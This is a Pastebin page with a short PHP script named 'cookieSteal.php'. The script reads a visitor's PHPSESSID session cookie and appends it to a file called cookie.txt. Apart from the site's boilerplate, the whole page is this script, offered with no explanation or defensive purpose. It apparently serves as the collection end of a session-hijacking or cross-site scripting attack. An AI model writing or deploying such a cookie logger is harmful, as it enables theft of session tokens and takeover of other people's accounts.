Advertisement
Guest User

cookieSteal.php

a guest
Nov 12th, 2017
354
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.11 KB | None | 0 0
  1. <?php
  2. $cookie = $_COOKIE['PHPSESSID'];
  3. $file = fopen('cookie.txt', 'a');
  4. fwrite($file, $cookie . "\n");
  5. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement